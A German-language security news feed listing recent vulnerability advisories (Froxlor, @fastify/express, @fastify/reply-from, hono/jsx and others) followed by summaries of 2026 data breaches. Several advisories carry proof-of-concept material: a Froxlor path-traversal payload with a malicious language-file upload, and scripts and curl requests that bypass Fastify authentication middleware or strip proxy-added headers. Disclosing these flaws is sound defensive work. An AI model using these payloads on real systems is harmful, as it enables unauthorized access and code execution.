| Risiko / Label | Veröffentlichung | |
|---|---|---|
| Risiko 9.5 / 10 CVE-2026-32179 | vor 1 Stunde(n) | |
| ### Summary Improper input validation in Microsoft QUIC allows an unauthorized attacker to elevate privileges over a network. ### Details Improper Input Validation Integer Underflow (Wrap or Wraparound) when decoding ACK frame. #### Patches - Fix underflow in ACK frame parsing - 1e6e999b ### Impact An attacker who successfully exploited this vulnerability could gain elevated privileges. ### MSRC CVE Info https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32179 | ||
| Risiko 7.5 / 10 GHSA-33r3-4whc-44c2 | vor 1 Stunde(n) | |
| ### Summary
`downloadPackageManager()` in `vite-plus/binding` accepts an untrusted `version` string and uses it directly in filesystem paths. A caller can supply `../` segments to escape the `VP_HOME/package_manager/ |
||
| Risiko 5 / 10 GHSA-458j-xx4x-4375 | vor 1 Stunde(n) | |
| ## Summary Improper handling of JSX attribute names in hono/jsx allows malformed attribute keys to corrupt the generated HTML output. When untrusted input is used as attribute keys during server-side rendering, specially crafted keys can break out of attribute or tag boundaries and inject unintended HTML. ## Details When rendering JSX elements to HTML strings, attribute values are escaped, but attribute names (keys) were previously inserted into the output without validation. If an attribute name contains characters such as `"`, `>`, or whitespace, it can alter the structure of the generated HTML. For example, malformed attribute names can: * Break out of the current attribute and introduce unintended additional attributes * Break out of the current HTML tag and inject new elements into the output This issue arises when untrusted input (such as query parameters or form data) is used as JSX attribute keys during server-side rendering. ## Impact An attacker who can control attribute keys used in JSX rendering may inject unintended attributes or HTML elements into the generated output. This may lead to: * Injection of unexpected HTML attributes * Corruption of the HTML structure * Potential cross-site scripting (XSS) if combined with unsafe usage patterns This issue affects applications that pass untrusted input as JSX attribute keys during server-side rendering. | ||
| Risiko 9.5 / 10 GHSA-w59f-67xm-rxx7 | vor 1 Stunde(n) | |
| ## Summary
The Froxlor API endpoint `Customers.update` (and `Admins.update`) does not validate the `def_language` parameter against the list of available language files. An authenticated customer can set `def_language` to a path traversal payload (e.g., `../../../../../var/customers/webs/customer1/evil`), which is stored in the database. On subsequent requests, `Language::loadLanguage()` constructs a file path using this value and executes it via `require`, achieving arbitrary PHP code execution as the web server user.
## Details
**Root cause:** The API and web UI have inconsistent validation for the `def_language` parameter.
The **web UI** (`customer_index.php:261`, `admin_index.php:265`) correctly validates `def_language` against `Language::getLanguages()`, which scans the `lng/` directory for actual language files:
```php
// customer_index.php:260-265
$def_language = Validate::validate(Request::post('def_language'), 'default language');
if (isset($languages[$def_language])) {
Customers::getLocal($userinfo, [
'id' => $userinfo['customerid'],
'def_language' => $def_language
])->update();
```
The **API** (`Customers.php:1207`, `Admins.php:600`) only runs `Validate::validate()` with the default regex `/^[^\r\n\t\f\0]*$/D`, which permits path traversal sequences:
```php
// Customers.php:1167-1172 (customer branch)
} else {
// allowed parameters
$def_language = $this->getParam('def_language', true, $result['def_language']);
...
}
// Customers.php:1207 - validation (shared by admin and customer paths)
$def_language = Validate::validate($def_language, 'default language', '', '', [], true);
```
The tainted value is stored in the `panel_customers` (or `panel_admins`) table. On every subsequent request, it is loaded and used in two paths:
**API path** (`ApiCommand.php:218-222`):
```php
private function initLang()
{
Language::setLanguage(Settings::Get('panel.standardlanguage'));
if ($this->getUserDetail('language') !== null && isset(Language::getLanguages()[$this->getUserDetail('language')])) {
Language::setLanguage($this->getUserDetail('language'));
} elseif ($this->getUserDetail('def_language') !== null) {
Language::setLanguage($this->getUserDetail('def_language')); // No validation
}
}
```
**Web path** (`init.php:180-185`):
```php
if (CurrentUser::hasSession()) {
if (!empty(CurrentUser::getField('language')) && isset(Language::getLanguages()[CurrentUser::getField('language')])) {
Language::setLanguage(CurrentUser::getField('language'));
} else {
Language::setLanguage(CurrentUser::getField('def_language')); // No validation
}
}
```
The `language` session field is `null` for API requests and empty on fresh web logins, so both paths fall through to the unvalidated `def_language`.
**File inclusion** (`Language.php:89-98`):
```php
private static function loadLanguage($iso): array
{
$languageFile = dirname(__DIR__, 2) . sprintf('/lng/%s.lng.php', $iso);
if (!file_exists($languageFile)) {
return [];
}
$lng = require $languageFile; // Arbitrary PHP execution
```
With `$iso = '../../../../../var/customers/webs/customer1/evil'`, the path resolves to `/var/customers/webs/customer1/evil.lng.php`, escaping the `lng/` directory.
## PoC
**Step 1 — Upload malicious language file via FTP:**
Froxlor customers have FTP access to their web directory by default (`api_allowed` defaults to `1` in the schema).
```bash
# Create malicious .lng.php file
echo ' /tmp/pwned"); return [];' > evil.lng.php
# Upload to customer web directory via FTP
ftp panel.example.com
> put evil.lng.php
```
The file is now at `/var/customers/webs/ |
||
| Risiko 9.5 / 10 CVE-2026-33805 | vor 15 Stunde(n) | |
| ### Summary `@fastify/reply-from` and `@fastify/http-proxy` process the client's `Connection` header after the proxy has added its own headers via `rewriteRequestHeaders`. This allows attackers to retroactively strip proxy-added headers (like access control or identification headers) from upstream requests by listing them in the `Connection` header value. This affects applications using these plugins with custom header injection for routing, access control, or security purposes. ### Details The vulnerability exists in `@fastify/reply-from/lib/request.js` at lines 128-136 (HTTP/1.1 handler) and lines 191-200 (undici handler). The processing flow is: 1. Client headers are copied including the `connection` header (`@fastify/reply-from/index.js` line 91) 2. The proxy adds custom headers via `rewriteRequestHeaders` (line 151) 3. During request construction, the transport handlers read the client's `Connection` header and strip any headers listed in it 4. This stripping happens after `rewriteRequestHeaders`, allowing clients to target proxy-added headers for removal RFC 7230 Section 6.1 Connection header processing is intended for proxies to strip hop-by-hop headers from incoming requests before adding their own headers. The current implementation reverses this order, processing the client's Connection header after the proxy has already modified the header set. The call chain: 1. `@fastify/reply-from/index.js` line 91: `headers = { ...req.headers }` — copies ALL client headers including `connection` 2. `index.js` line 151: `requestHeaders = rewriteRequestHeaders(this.request, headers)` — proxy adds custom headers (e.g., `x-forwarded-by`) 3. `index.js` line 180: `requestImpl({...headers: requestHeaders...})` — passes headers to transport 4. `request.js` line 191 (undici): `getConnectionHeaders(req.headers)` — reads Connection header FROM THE CLIENT 5. `request.js` lines 198-200: Strips headers listed in Connection — including proxy-added headers This is distinct from the general hop-by-hop forwarding concern — it's specifically about the client controlling which headers get stripped from the upstream request via the Connection header, subverting the proxy's `rewriteRequestHeaders` function. ### PoC Self-contained reproduction with an upstream echo service and a proxy that adds a custom header: ```javascript const fastify = require('fastify'); async function test() { // Upstream service that echoes headers const upstream = fastify({ logger: false }); upstream.get('/api/echo-headers', async (request) => { return { headers: request.headers }; }); await upstream.listen({ port: 19801 }); // Proxy that adds a custom header via rewriteRequestHeaders const proxy = fastify({ logger: false }); await proxy.register(require('@fastify/reply-from'), { base: 'http://localhost:19801' }); proxy.get('/proxy/*', async (request, reply) => { const target = '/' + (request.params['*'] || ''); return reply.from(target, { rewriteRequestHeaders: (originalReq, headers) => { return { ...headers, 'x-forwarded-by': 'fastify-proxy' }; } }); }); await proxy.listen({ port: 19800 }); // Baseline: proxy adds x-forwarded-by header const res1 = await proxy.inject({ method: 'GET', url: '/proxy/api/echo-headers' }); console.log('Baseline response headers from upstream:'); const body1 = JSON.parse(res1.body); console.log(' x-forwarded-by:', body1.headers['x-forwarded-by'] || 'NOT PRESENT'); // Attack: Connection header strips the proxy-added header const res2 = await proxy.inject({ method: 'GET', url: '/proxy/api/echo-headers', headers: { 'connection': 'x-forwarded-by' } }); console.log('\nAttack response headers from upstream:'); const body2 = JSON.parse(res2.body); console.log(' x-forwarded-by:', body2.headers['x-forwarded-by'] || 'NOT PRESENT (stripped!)'); await proxy.close(); await upstream.close(); } test(); ``` Actual output: ``` Baseline response headers from upstream: x-forwarded-by: fastify-proxy Attack response headers from upstream: x-forwarded-by: NOT PRESENT (stripped!) ``` The `x-forwarded-by` header that the proxy explicitly added in `rewriteRequestHeaders` is stripped before reaching the upstream. Multiple headers can be stripped at once by sending `Connection: x-forwarded-by, x-forwarded-for`. Both the undici (default) and HTTP/1.1 transport handlers in `@fastify/reply-from` are affected, as well as `@fastify/http-proxy` which delegates to `@fastify/reply-from`. ### Impact Attackers can selectively remove any header added by the proxy's `rewriteRequestHeaders` function. This enables several attack scenarios: 1. **Bypass proxy identification**: Strip headers that identify requests as coming through the proxy, potentially bypassing upstream controls that differentiate between direct and proxied requests 2. **Circumvent access control**: If the proxy adds headers used for routing, authorization, or security decisions (e.g., `x-internal-auth`, `x-proxy-token`), attackers can strip them to access unauthorized resources 3. **Remove arbitrary headers**: Any header can be targeted, including `Connection: authorization` to strip authentication or `Connection: x-forwarded-for, x-forwarded-by` to remove multiple headers at once This vulnerability affects deployments where the proxy adds security-relevant headers that downstream services rely on for access control decisions. It undermines the security model where proxies act as trusted intermediaries adding authentication or routing signals. ### Affected Versions - `@fastify/reply-from` — All versions, both undici (default) and HTTP/1.1 transport handlers - `@fastify/http-proxy` — All versions (delegates to `@fastify/reply-from`) - Any configuration using `rewriteRequestHeaders` to add headers that could be security-relevant - No special configuration required to exploit — works with default settings ### Suggested Fix The Connection header from the client should be processed and consumed before `rewriteRequestHeaders` is called, not after. Alternatively, the Connection header processing in `request.js` should maintain a list of headers that existed in the original client request and only strip those, not headers added by `rewriteRequestHeaders`. | ||
| Risiko 9.5 / 10 CVE-2026-33808 | vor 16 Stunde(n) | |
| ### Summary `@fastify/express` v4.0.4 fails to normalize URLs before passing them to Express middleware when Fastify router normalization options are enabled. This allows complete bypass of path-scoped authentication middleware via two vectors: 1. **Duplicate slashes** (`//admin/dashboard`) when `ignoreDuplicateSlashes: true` is configured 2. **Semicolon delimiters** (`/admin;bypass`) when `useSemicolonDelimiter: true` is configured In both cases, Fastify's router normalizes the URL and matches the route, but `@fastify/express` passes the original un-normalized URL to Express middleware, which fails to match and is skipped. Note: This is distinct from GHSA-g6q3-96cp-5r5m (CVE-2026-22037), which addressed URL percent-encoding bypass and was patched in v4.0.3. These normalization gaps remain in v4.0.4. A similar class of normalization issue was addressed in `@fastify/middie` via GHSA-8p85-9qpw-fwgw (CVE-2026-2880), but `@fastify/express` does not include the equivalent fixes. ### Details The vulnerability exists in `@fastify/express`'s `enhanceRequest` function (`index.js` lines 43-46): ```javascript const decodedUrl = decodeURI(url) req.raw.url = decodedUrl ``` The `decodeURI()` function only handles percent-encoding — it does not normalize duplicate slashes or strip semicolon-delimited parameters. When Fastify's router options are enabled, `find-my-way` applies these normalizations during route matching, but `@fastify/express` passes the original URL to Express middleware. #### Vector 1: Duplicate Slashes When `ignoreDuplicateSlashes: true` is set, Fastify's `find-my-way` router normalizes `//admin/dashboard` to `/admin/dashboard` for route matching. However, Express middleware receives `//admin/dashboard`. Express's `app.use('/admin', authMiddleware)` expects paths to start with `/admin/`, but `//admin` does not match the `/admin` prefix pattern. The attack sequence: 1. Client sends `GET //admin/dashboard` 2. Fastify's router normalizes this to `/admin/dashboard` and finds a matching route 3. `enhanceRequest` sets `req.raw.url = "//admin/dashboard"` (preserves double slash) 4. Express middleware `app.use('/admin', authMiddleware)` does not match `//admin` prefix 5. Authentication is bypassed, and the Fastify route handler executes #### Vector 2: Semicolon Delimiters When `useSemicolonDelimiter: true` is configured, the router uses `find-my-way`'s `safeDecodeURI()` which treats semicolons as query string delimiters, splitting `/admin;bypass` into path `/admin` and querystring `bypass` for route matching. However, `@fastify/express` passes the full URL `/admin;bypass` to Express middleware. Express uses path-to-regexp v0.1.12 internally, which compiles middleware paths like `/admin` to the regex `/^\/admin\/?(?=\/|$)/i`. A semicolon character does not satisfy the lookahead condition, causing the middleware match to fail. The attack flow: 1. Request `GET /admin;bypass` arrives 2. Fastify router: splits at `;` — matches route `GET /admin` 3. Express middleware: regex `/^\/admin\/?(?=\/|$)/i` fails against `/admin;bypass` — middleware skipped 4. Route handler executes without authentication checks ### PoC #### Duplicate Slash Bypass Save as `server.js` and run with `node server.js`: ```js const fastify = require('fastify') async function start() { const app = fastify({ logger: false, ignoreDuplicateSlashes: true, // documented Fastify option }) await app.register(require('@fastify/express')) // Standard Express middleware auth pattern app.use('/admin', function expressAuthGate(req, res, next) { const auth = req.headers.authorization if (!auth || auth !== 'Bearer admin-secret-token') { res.statusCode = 403 res.setHeader('content-type', 'application/json') res.end(JSON.stringify({ error: 'Forbidden by Express middleware' })) return } next() }) // Protected route app.get('/admin/dashboard', async (request) => { return { message: 'Admin dashboard', secret: 'sensitive-admin-data' } }) await app.listen({ port: 3000 }) console.log('Listening on http://localhost:3000') } start() ``` ```bash # Normal access — blocked by Express middleware $ curl -s http://localhost:3000/admin/dashboard {"error":"Forbidden by Express middleware"} # Double-slash bypass — Express middleware skipped, handler runs $ curl -s http://localhost:3000//admin/dashboard {"message":"Admin dashboard","secret":"sensitive-admin-data"} # Triple-slash also works $ curl -s http://localhost:3000///admin/dashboard {"message":"Admin dashboard","secret":"sensitive-admin-data"} ``` Multiple variants work: `///admin`, `/.//admin`, `//admin//dashboard`, etc. #### Semicolon Bypass ```javascript const fastify = require('fastify') const http = require('http') function get(port, url) { return new Promise((resolve, reject) => { http.get('http://localhost:' + port + url, (res) => { let data = '' res.on('data', (chunk) => data += chunk) res.on('end', () => resolve({ status: res.statusCode, body: data })) }).on('error', reject) }) } async function test() { const app = fastify({ logger: false, routerOptions: { useSemicolonDelimiter: true } }) await app.register(require('@fastify/express')) // Auth middleware blocking unauthenticated access app.use('/admin', function(req, res, next) { if (!req.headers.authorization) { res.statusCode = 403 res.setHeader('content-type', 'application/json') res.end(JSON.stringify({ error: 'Forbidden' })) return } next() }) app.get('/admin', async () => ({ secret: 'classified-info' })) await app.listen({ port: 19900, host: '0.0.0.0' }) // Blocked: let r = await get(19900, '/admin') console.log('/admin:', r.status, r.body) // Output: /admin: 403 {"error":"Forbidden"} // BYPASS: r = await get(19900, '/admin;bypass') console.log('/admin;bypass:', r.status, r.body) // Output: /admin;bypass: 200 {"secret":"classified-info"} r = await get(19900, '/admin;') console.log('/admin;:', r.status, r.body) // Output: /admin;: 200 {"secret":"classified-info"} await app.close() } test() ``` Actual output: ``` /admin: 403 {"error":"Forbidden"} /admin;bypass: 200 {"secret":"classified-info"} /admin;: 200 {"secret":"classified-info"} ``` The semicolon bypass works with any text after it: `/admin;`, `/admin;x`, `/admin;jsessionid=123`. ### Impact Complete authentication bypass for applications using Express middleware for path-based access control. An unauthenticated attacker can access protected routes (admin panels, APIs, user data) by manipulating the URL path. **Duplicate slash vector** affects applications that: 1. Use `@fastify/express` with `ignoreDuplicateSlashes: true` 2. Rely on Express middleware for authentication/authorization 3. Use path-scoped middleware patterns like `app.use('/admin', authMiddleware)` **Semicolon vector** affects applications that: 1. Use `@fastify/express` with `useSemicolonDelimiter: true` (commonly enabled for Java application server compatibility, e.g., handling `;jsessionid=` parameters) 2. Rely on Express middleware for authentication/authorization 3. Use path-scoped middleware patterns like `app.use('/admin', authMiddleware)` The bypass works against all Express middleware that uses prefix path matching, including popular packages like `express-basic-auth`, custom authentication middleware, and rate limiting middleware. The `ignoreDuplicateSlashes` and `useSemicolonDelimiter` options are documented as convenience features, not marked as security-sensitive, so developers would not expect them to impact middleware security. ### Affected Versions - `@fastify/express` v4.0.4 (latest) with Fastify 5.x - Requires `ignoreDuplicateSlashes: true` or `useSemicolonDelimiter: true` in Fastify configuration (via top-level option or `routerOptions`) ### Variant Testing **Duplicate slashes:** | Request | Express Middleware | Handler Runs | Result | |---------|-------------------|--------------|--------| | `GET /admin/dashboard` | Invoked (blocks) | No | 403 Forbidden | | `GET //admin/dashboard` | Skipped | Yes | 200 OK — **BYPASS** | | `GET ///admin/dashboard` | Skipped | Yes | 200 OK — **BYPASS** | | `GET /.//admin/dashboard` | Skipped | Yes | 200 OK — **BYPASS** | | `GET //admin//dashboard` | Skipped | Yes | 200 OK — **BYPASS** | | `GET /admin//dashboard` | Invoked (blocks) | No | 403 Forbidden | **Semicolons:** | URL | Express MW Fires | Route Matches | Result | |---|---|---|---| | `/admin` | Yes | Yes (200/403) | Normal | | `/admin;` | No | Yes (200) | **BYPASS** | | `/admin;bypass` | No | Yes (200) | **BYPASS** | | `/admin;x=1` | No | Yes (200) | **BYPASS** | | `/admin;/dashboard` | No | Yes (200, routes to /admin) | **BYPASS** | | `/admin/dashboard;x` | Yes | Yes (routes to /admin/dashboard) | Normal (prefix /admin/ still matches) | The semicolon bypass is effective when the semicolon appears immediately after the middleware prefix boundary. For sub-paths where the prefix is already matched (e.g., `/admin/dashboard;x`), Express's prefix regex succeeds because the `/admin/` part matches before the semicolon appears. ### Suggested Fix `@fastify/express` should normalize URLs before passing them to Express middleware, respecting the router normalization options that are enabled. Specifically: - When `ignoreDuplicateSlashes` is enabled, apply `FindMyWay.removeDuplicateSlashes()` to `req.raw.url` before middleware execution - When `useSemicolonDelimiter` is enabled, strip semicolon-delimited parameters from the URL before passing to Express This would match the normalization behavior that `@fastify/middie` already implements via `sanitizeUrlPath()` and `normalizePathForMatching()`. | ||
| Risiko 9.5 / 10 CVE-2026-33807 | vor 16 Stunde(n) | |
| ### Summary `@fastify/express` v4.0.4 contains a path handling bug in the `onRegister` function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required — this affects the default Fastify configuration. ### Details The vulnerability exists in the `onRegister` function at `index.js` lines 92-101. When a child plugin is registered with a prefix, the `onRegister` hook copies middleware from the parent scope and re-registers it using `instance.use(...middleware)`. However, the middleware paths stored in `kMiddlewares` are already prefixed from their original registration. The call flow demonstrates the problem: 1. Parent scope registers middleware: `app.use('/admin', authFn)` — `use()` calculates path as `'' + '/admin' = '/admin'` — stores `['/admin', authFn]` in `kMiddlewares` 2. Child plugin registers with `{ prefix: '/admin' }` — triggers `onRegister(instance)` 3. `onRegister` copies parent middleware and calls `instance.use('/admin', authFn)` on child 4. Child's `use()` function calculates path as `'/admin' + '/admin' = '/admin/admin'` — registers middleware with doubled path 5. Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path `/admin/admin` 6. Requests to `/admin/secret` don't match `/admin/admin` — middleware is silently skipped The root cause is in the `use()` function at lines 25-26, which always prepends `this.prefix` to string paths, combined with `onRegister` re-calling `use()` with already-prefixed paths. ### PoC ```javascript const fastify = require('fastify'); const http = require('http'); function get(port, url) { return new Promise((resolve, reject) => { http.get('http://localhost:' + port + url, (res) => { let data = ''; res.on('data', (chunk) => data += chunk); res.on('end', () => resolve({ status: res.statusCode, body: data })); }).on('error', reject); }); } async function test() { const app = fastify({ logger: false }); await app.register(require('@fastify/express')); // Middleware enforcing auth on /admin routes app.use('/admin', function(req, res, next) { if (!req.headers.authorization) { res.statusCode = 403; res.setHeader('content-type', 'application/json'); res.end(JSON.stringify({ error: 'Forbidden' })); return; } next(); }); // Root scope route — middleware works correctly app.get('/admin/root-data', async () => ({ data: 'root-secret' })); // Child scope route — middleware BYPASSED await app.register(async function(child) { child.get('/secret', async () => ({ data: 'child-secret' })); }, { prefix: '/admin' }); await app.listen({ port: 19876, host: '0.0.0.0' }); // Root scope: correctly blocked let r = await get(19876, '/admin/root-data'); console.log('/admin/root-data (no auth):', r.status, r.body); // Output: 403 {"error":"Forbidden"} // Child scope: BYPASSED — secret data returned without auth r = await get(19876, '/admin/secret'); console.log('/admin/secret (no auth):', r.status, r.body); // Output: 200 {"data":"child-secret"} await app.close(); } test(); ``` Actual output: ``` /admin/root-data (no auth): 403 {"error":"Forbidden"} /admin/secret (no auth): 200 {"data":"child-secret"} ``` ### Impact Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes. - No special request crafting is required — normal requests bypass the middleware - It affects the idiomatic Fastify plugin pattern commonly used in production - The bypass is silent with no errors or warnings - Developers' basic testing of root-scoped routes will pass, masking the vulnerability - Any child plugin scope that shares a prefix with middleware is affected Applications using `@fastify/express` with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations. ### Affected Versions - `@fastify/express` v4.0.4 (latest at time of discovery) - Fastify 5.x in default configuration - No special router options required (`ignoreDuplicateSlashes` not needed) - Affects any child plugin registration where the prefix overlaps with middleware path scoping - Does NOT affect middleware registered without path scoping (global middleware) - Does NOT affect middleware registered on root path (`/`) due to special case handling ### Variant Testing | Scenario | Middleware Path | Child Prefix | Result | |---|---|---|---| | Root route `/admin/root-data` | `/admin` | N/A | Middleware runs (403) | | Child route `/admin/secret` | `/admin` | `/admin` | **BYPASS** (200) | | Child route `/api/data` | `/api` | `/api` | **BYPASS** (200) | | Nested child `/admin/sub/data` | `/admin` | `/admin/sub` | **BYPASS** — path becomes `/admin/sub/admin` | | Middleware on `/` with any child | `/` | `/api` | No bypass — `path === '/' && prefix.length > 0` special case | ### Suggested Fix The `onRegister` function should store and re-use the original unprefixed middleware paths, or avoid re-calling the `use()` function entirely. Options include: 1. Store the original path and function separately in `kMiddlewares` before prefixing 2. Strip the parent prefix before re-registering in child scopes 3. Store already-constructed Express middleware objects rather than re-processing paths | ||
| 07.04.2026 - My Lovely AI | 106.271 Datensätze geleaked | |
| Email addresses, Social media profiles In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames. |
||
| 02.04.2026 - SongTrivia2 | 291.739 Datensätze geleaked | |
| Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars. |
||
| 31.03.2026 - Hallmark | 1.736.520 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets. |
||
| 26.03.2026 - BreachForums Version 5 | 339.778 Datensätze geleaked | |
| Email addresses, Passwords, Usernames In March 2026, a breach of one of the many iterations of the BreachForums hacking forum known as "Version 5" was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes. |
||
| 25.03.2026 - Sound Radix | 292.993 Datensätze geleaked | |
| Email addresses, Names, Passwords In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that it is possible that additional data including hashed passwords may have been exposed, and that no financial or credit card information was impacted. |
||
| 13.03.2026 - Divine Skins | 105.814 Datensätze geleaked | |
| Email addresses, Purchases, Usernames In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users. |
||
| 12.03.2026 - Crunchyroll | 1.195.684 Datensätze geleaked | |
| Email addresses In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being sold was later provided to HIBP. |
||
| 08.03.2026 - Baydöner | 1.266.822 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included Turkish national ID number and date of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected. |
||
| 06.03.2026 - Aura | 903.080 Datensätze geleaked | |
| Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised. |
||
| 04.03.2026 - SUCCESS | 253.510 Datensätze geleaked | |
| Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS' disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors. |
||
| 25.02.2026 - KomikoAI | 1.060.191 Datensätze geleaked | |
| AI prompts, Email addresses, Forum posts, Names In February, the AI-powered comic generation platform KomikoAI suffered a data breach. The incident exposed 1M unique email addresses along with names, user posts and the AI prompts used to generate content. The exposed data enables the mapping of individual AI prompts to specific email addresses. |
||
| 25.02.2026 - Lovora | 495.556 Datensätze geleaked | |
| Display names, Email addresses, Profile photos In February 2026, the couples and relationship app Lovora allegedly suffered a data breach that exposed 496k unique email addresses. The data also included users’ display names and profile photos, along with other personal information collected through use of the app. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident. |
||
| 17.02.2026 - Quitbro | 22.874 Datensätze geleaked | |
| Email addresses, Partial dates of birth, Usernames In February 2026, the porn addiction app Quitbro allegedly suffered a data breach that exposed 23k unique email addresses. The data also included users’ years of birth, responses to questions within the app and their last recorded relapse time. The app’s maker, Plantake, did not respond to multiple attempts to contact them about the incident. |
||
| 14.02.2026 - CarGurus | 12.461.887 Datensätze geleaked | |
| Email addresses, IP addresses, Names, Phone numbers, Physical addresses In February 2026, the automotive marketplace CarGurus was the target of a data breach attributed to the threat actor ShinyHunters. Following an attempted extortion, the data was published publicly and contained more than 12M email addresses across multiple files including user account ID mappings, finance pre-qualification application data and dealer account and subscription information. Impacted data also included names, phone numbers, physical and IP addresses, and auto finance application outcomes. |
||
| 12.02.2026 - Odido | 6.077.025 Datensätze geleaked | |
| Bank account numbers, Customer service comments, Dates of birth, Driver's licenses, Email addresses, Genders, Government issued IDs, Names, Passport numbers, Phone numbers, Physical addresses In February 2026, Dutch telco Odido was the victim of a data breach and subsequent extortion attempt. Shortly after, a total of 6M unique email addresses were published across four separate data releases over consecutive days. The exposed data includes names, physical addresses, phone numbers, bank account numbers, dates of birth, customer service notes and passport, driver’s licence and European national ID numbers. Odido has published a disclosure notice including an FAQ to support affected customers. |
||
| 06.02.2026 - Toy Battles | 1.017 Datensätze geleaked | |
| Chat logs, Email addresses, IP addresses, Usernames In February 2026, the online gaming community Toy Battles suffered a data breach. The incident exposed 1k unique email addresses alongside usernames, IP addresses and chat logs. Following the breach, Toy Battles self-submitted the data to Have I Been Pwned. |
||
| 30.01.2026 - Association Nationale des Premiers Secours | 5.600 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Places of birth, Salutations In January 2026, a data breach impacting the French non-profit Association Nationale des Premiers Secours (ANPS) was posted to a hacking forum. The breach exposed 5.6k unique email addresses along with names, dates of birth and places of birth. ANPS self-submitted the data to HIBP and advised the incident was traced back to a legacy system and did not impact health data, financial information or passwords. |
||
| 30.01.2026 - Provecho | 712.904 Datensätze geleaked | |
| Email addresses, Usernames In early 2026, data purportedly sourced from the recipe and meal planning service Provecho was alleged to have been obtained in a breach. The exposed data included 713k unique email address along with username and the creator account holders followed. Provecho has been notified and is aware of the claims surrounding the incident. |
||
| 28.01.2026 - Figure | 967.178 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Phone numbers, Physical addresses In February 2026, data obtained from the fintech lending platform Figure was publicly posted online. The exposed data, dating back to January 2026, contained over 900k unique email addresses along with names, phone numbers, physical addresses and dates of birth. Figure confirmed the incident and attributed it to a social engineering attack in which an employee was tricked into providing access. |
||
| 24.01.2026 - CarMax | 431.371 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In January 2026, data allegedly sourced from US automotive retailer CarMax was published online following a failed extortion attempt. The data included 431k unique email addresses along with names, phone numbers and physical addresses. |
||
| 09.01.2026 - Betterment | 1.435.174 Datensätze geleaked | |
| Dates of birth, Device information, Email addresses, Employers, Geographic locations, Job titles, Names, Phone numbers, Physical addresses In January 2026, the automated investment platform Betterment confirmed it had suffered a data breach attributed to a social engineering attack. As part of the incident, Betterment customers received fraudulent crypto-related messages promising high returns if funds were sent to an attacker-controlled cryptocurrency wallet. The breach exposed 1.4M unique email addresses, along with names and geographic location data. A subset of records also included dates of birth, phone numbers, and physical addresses. In its disclosure notice, Betterment stated that the incident did not provide attackers with access to customer accounts and did not expose passwords or other login credentials. |
||
| 07.01.2026 - Instagram | 6.215.150 Datensätze geleaked | |
| Display names, Email addresses, Geographic locations, Phone numbers, Usernames In January 2026, data allegedly scraped via an Instagram API was posted to a popular hacking forum. The dataset contained 17M rows of public Instagram information, including usernames, display names, account IDs, and in some cases, geolocation data. Of these records, 6.2M included an associated email address, and some also contained a phone number. The scraped data appears to be unrelated to password reset requests initiated on the platform, despite coinciding in timeframe. There is no evidence that passwords or other sensitive data were compromised. |
||
| 07.01.2026 - Panera Bread | 5.112.502 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In January 2026, Panera Bread suffered a data breach that exposed 14M records. After an attempted extortion failed, the attackers published the data publicly, which included 5.1M unique email addresses along with associated account information such as names, phone numbers and physical addresses. Panera Bread subsequently confirmed that "the data involved is contact information" and that authorities were notified. |
||
| 29.12.2025 - WhiteDate | 20.363 Datensätze geleaked | |
